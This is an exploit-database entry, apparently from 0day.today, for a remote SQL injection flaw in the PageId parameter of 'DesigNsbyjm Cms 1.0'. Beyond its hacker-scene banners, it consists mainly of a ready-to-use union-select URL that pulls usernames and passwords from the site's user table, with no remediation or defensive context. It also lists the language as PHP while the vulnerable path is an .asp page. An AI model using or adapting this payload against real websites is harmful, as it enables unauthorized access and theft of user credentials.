DesigNsbyjm Cms <= 1.0 (PageId) Remote SQL Injection Vulnerability

2009-12-15T00:00:00
ID 1337DAY-ID-10264
Type zdt
Reporter R3d-D3v!L
Modified 2009-12-15T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
DesigNsbyjm Cms <= 1.0 (PageId) Remote SQL Injection Vulnerability
==================================================================

===========================================================================
===
[»] ~ Note : Hacker R0x Lamerz Sux !
===========================================================================
===
[»] DesigNsbyjm Cms <== 1.0 (PageId) Remote SQL Injection
Vulnerability
===========================================================================
===
[»] my home: [ Hackteach.org ]
[»] Script: [ DesigNsbyjm Cms 1.0 ]
[»] Language: [ PHP ]
[»] Home: [ http://designsbyjm.net/ ]
########################################################################
 
===[ Exploit SQL ]===
 
[»] [Path]/viewcontent.asp?pageid=[SQL]
 
http://server/viewcontent.asp?pageid=-9+union+select+1,2,3,4,
password,6,username,8,9,10,11,12,13+from+user



#  0day.today [2018-02-18]  #